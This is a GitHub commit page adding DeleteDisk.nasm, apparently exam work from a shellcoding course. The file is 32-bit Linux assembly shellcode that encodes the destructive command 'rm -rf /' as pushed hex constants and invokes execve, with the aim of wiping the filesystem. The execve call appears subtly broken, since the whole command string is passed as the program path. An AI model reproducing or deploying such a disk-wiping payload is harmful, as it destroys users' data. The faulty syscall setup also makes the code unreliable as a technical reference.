Skip to content

Commit

Permalink
Added DeleteDisk.nasm code.
Browse files Browse the repository at this point in the history
  • Loading branch information
cr7pt0pl4gu3 committed Nov 15, 2020
1 parent 9e90108 commit 702c2eb
Show file tree
Hide file tree
Showing 3 changed files with 25 additions and 0 deletions.
Binary file added Exam/DeleteDisk/DeleteDisk
Binary file not shown.
25 changes: 25 additions & 0 deletions Exam/DeleteDisk/DeleteDisk.nasm
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
; DeleteDisk.nasm
; Author: Ravehorn

global _start

section .text

_start:

xor eax, eax
push eax

push 0x2f206672
push 0x2d206d72

mov ebx, esp

push eax
mov edx, esp

push ebx
mov ecx, esp

mov al, 0xb
int 0x80
Binary file added Exam/DeleteDisk/DeleteDisk.o
Binary file not shown.

0 comments on commit 702c2eb

Please sign in to comment.